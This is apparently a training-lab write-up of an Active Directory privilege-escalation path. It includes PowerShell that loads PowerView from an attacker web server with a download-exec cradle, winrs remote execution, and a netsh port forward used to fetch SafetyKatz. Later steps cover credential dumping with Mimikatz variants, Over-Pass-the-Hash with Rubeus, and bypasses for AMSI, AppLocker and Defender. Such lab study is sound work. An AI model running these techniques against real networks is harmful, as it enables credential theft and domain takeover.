🪜Domain admin session in target domain -> escalate privileges
We are going to start by using Find-DomainUserLocation (PowerView) from the reverse shell we got earlier as ciadmin to look for machines where a domain admin is logged in.
We start by hosting the script block logging bypass (sbloggingbypass.txt) on a web server run from WSL and loading it with a download-exec cradle, so that Enhanced Script Block Logging does not record the rest of our PowerShell. Unfortunately, we have no in-memory bypass for PowerShell transcripts. Note that we could also paste the contents of sbloggingbypass.txt in place of the download-exec cradle.
Then we use the below command to bypass AMSI:
We had a tip from a guy on Discord to host the web server using WSL rather than hfs.exe ->
We then download PowerView on the target machine and run Find-DomainUserLocation from the reverse shell to look for machines where a domain admin is logged in.
We can see that there is a domain admin session on dcorp-mgmt server!
This means we are going to follow this path through the network: the user svcadmin is logged into the server dcorp-mgmt.dollarcorp.moneycorp.local. This user has domain admin privileges, which means they have high-level administrative access to the dcorp domain.
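The session hunt described above, as an added example that is not part of the original write-up. It assumes the student VM serves PowerView.ps1 from WSL on 172.16.100.X (placeholder address) and that the script block logging and AMSI bypasses have already been applied in the shell:

```powershell
# Added example (not from the original write-up). Assumptions: the student VM
# serves PowerView.ps1 over HTTP from WSL, e.g. with "python3 -m http.server 80",
# and 172.16.100.X is its address (placeholder).

# Load PowerView into memory in the reverse shell on dcorp-ci (download-exec cradle).
iex (iwr -UseBasicParsing 'http://172.16.100.X/PowerView.ps1')

# Find-DomainUserLocation enumerates sessions and logged-on users on every domain
# computer and keeps those belonging to the target group (Domain Admins by default).
# -CheckAccess also tests whether the current user is a local admin on each host
# where a target session was found, which tells us where we can actually land.
$hits = Find-DomainUserLocation -CheckAccess

# Keep only hosts we can already reach as admin; these are the pivot candidates.
$hits | Where-Object { $_.LocalAdmin } |
    Select-Object UserName, ComputerName, SessionFrom, LocalAdmin |
    Format-Table -AutoSize

# In the lab the interesting row is svcadmin on dcorp-mgmt.dollarcorp.moneycorp.local.
# To hunt a different group instead of Domain Admins:
# Find-DomainUserLocation -UserGroupIdentity 'Enterprise Admins' -CheckAccess
```

Without -CheckAccess the function still lists where the domain admins are logged on, but you then have to test admin access to the candidate host yourself (as the write-up does next with winrs).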
Abuse with Winrs
Now we have to check whether we can execute commands on the dcorp-mgmt server and whether the WinRM port (5985 for HTTP) is open:
winrs (Windows Remote Shell) is a command-line tool for executing commands on remote Windows machines over WinRM; it plays roughly the role SSH plays on Unix systems.
So we see that we can execute code on the dcorp-mgmt machine:
First we need to copy Loader.exe to dcorp-mgmt:
We copy it to the machine we have the reverse shell on (dcorp-ci) and from there to the target ->
We also need to avoid detection on dcorp-mgmt, so we set up port forwarding: a local port on dcorp-mgmt is redirected to our web server, so the download that Loader.exe performs appears to originate from localhost rather than from a direct connection to our host.
Then I wanted to run SafetyKatz through Loader.exe,
and unexpectedly it worked without any problems ->
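The access check, file copy and port forward from the steps above, as an added example that is not part of the original write-up. The student VM address 172.16.100.X, the web server port 80, the local paths, and the choice of netsh portproxy for the forward are my assumptions (the write-up does not say which tool it used); Loader.exe's own argument syntax is the lab's and is not reproduced here:

```powershell
# Added example (not from the original write-up). Assumptions: student VM web
# server at 172.16.100.X:80 (placeholder), Loader.exe already in C:\Users\Public
# on dcorp-ci, and netsh portproxy as the port-forwarding mechanism.

# 1. Is WinRM listening on the target? 5985 is the default WinRM HTTP port.
Test-NetConnection -ComputerName dcorp-mgmt -Port 5985 |
    Select-Object ComputerName, RemotePort, TcpTestSucceeded

# 2. Can we execute commands there with the current credentials (ciadmin)?
#    If this prints the remote hostname and our identity, we have code execution.
winrs -r:dcorp-mgmt hostname
winrs -r:dcorp-mgmt whoami

# 3. Copy Loader.exe from dcorp-ci to the target over the PSRemoting session.
#    Copy-Item -ToSession needs PowerShell 5.0 or later on both ends.
$s = New-PSSession -ComputerName dcorp-mgmt
Copy-Item -Path 'C:\Users\Public\Loader.exe' -Destination 'C:\Users\Public\Loader.exe' -ToSession $s

# 4. Port forward on dcorp-mgmt: 127.0.0.1:8080 -> student VM web server.
#    Loader.exe can then fetch SafetyKatz from http://127.0.0.1:8080/ and the
#    outbound connection to our host is made by the portproxy service, not by
#    Loader.exe itself, which is what hides the origin of the download.
winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=127.0.0.1 connectport=80 connectaddress=172.16.100.X"

# Verify the forward exists before launching Loader.exe.
winrs -r:dcorp-mgmt "netsh interface portproxy show v4tov4"

# Clean up afterwards so no persistent artefact is left on the host:
# winrs -r:dcorp-mgmt "netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=127.0.0.1"
```

The portproxy entry survives reboots and is visible to defenders in the registry and in `netsh interface portproxy show all`, so remove it once SafetyKatz has been loaded.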
Now, with these credentials, we are going to perform Over-Pass-the-Hash using svcadmin's creds. On the student VM we run an elevated shell and try to bypass potential detection:
And now we run Rubeus with %Pwn% in place of the asktgt command.
We can see that %Pwn% was expanded to asktgt, we successfully got our TGT, a shell popped (on the right), and we were able to execute code on the domain controller.
Process of this attack:
We load Loader.exe onto dcorp-mgmt via our Jenkins shell (dcorp-ci).
After port forwarding, we use SafetyKatz to get svcadmin's credentials.
We use Rubeus to perform Over-Pass-the-Hash and obtain a TGT.
We successfully obtain the ticket and can access the domain controller.
For the next task, we need to escalate to domain admin using derivative local admin. Let's find out the machines on which we have local admin privileges. On a PowerShell session started using Invisi-Shell, enter the following command.
After running the command,
we see that we have local admin on dcorp-adminsrv. You will notice that any attempt to run Loader.exe (to run SafetyKatz from memory) results in the error 'This program is blocked by group policy.'
This could be because of an application allowlist on dcorp-adminsrv, and we drop into Constrained Language Mode (CLM) when using PSRemoting.
Let's check whether AppLocker is configured on dcorp-adminsrv by querying its registry keys.
Looks like AppLocker is configured. After going through the policies, we can see that Microsoft-signed binaries and scripts are allowed for all users and nothing else. However, one rule is overly permissive:
everyone can run scripts from the C:\Program Files folder.
We could also have checked that with the following command:
Before abusing this, we need to disable Windows Defender:
We cannot run scripts using dot sourcing (. .\Invoke-Mimi.ps1) because of Constrained Language Mode. So we must modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script (Invoke-MimiEx.ps1) to the target server.
To bypass this we:
Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
Open Invoke-MimiEx.ps1 in PowerShell ISE (right-click on it and click Edit).
Add Invoke-Mimi -Command '"sekurlsa::ekeys"' as a new line at the end of the file.
Now, from our student VM, we transfer the file:
Here we see that the command was successful:
So we just have to run the file and collect our hashes:
So now we can ask for a TGT with Rubeus: on the local machine, open an elevated cmd and set these values to bypass Defender:
Now we ask for a TGT with the new hashes we got:
Then a shell spawns with srvadmin privileges; we just have to check whether srvadmin has admin privileges on any other machine:
So we can see we have local admin on dcorp-mgmt and dcorp-adminsrv.
We now need to transfer Loader.exe and Safty.bat.
We now need to run Invoke-Mimi on dcorp-mgmt.
We start by getting our shell, then bypass AMSI to download the .ps1 script:
And after that we can use Invoke-Mimi:
Invoke-Mimi for extracting credentials from the Credential Vault
We can also look for credentials in the Credential Vault. Interesting credentials, such as those used for scheduled tasks, are stored there.
And finally, from the Student VM, we can use the hash we found to perform Over-Pass-the-Hash.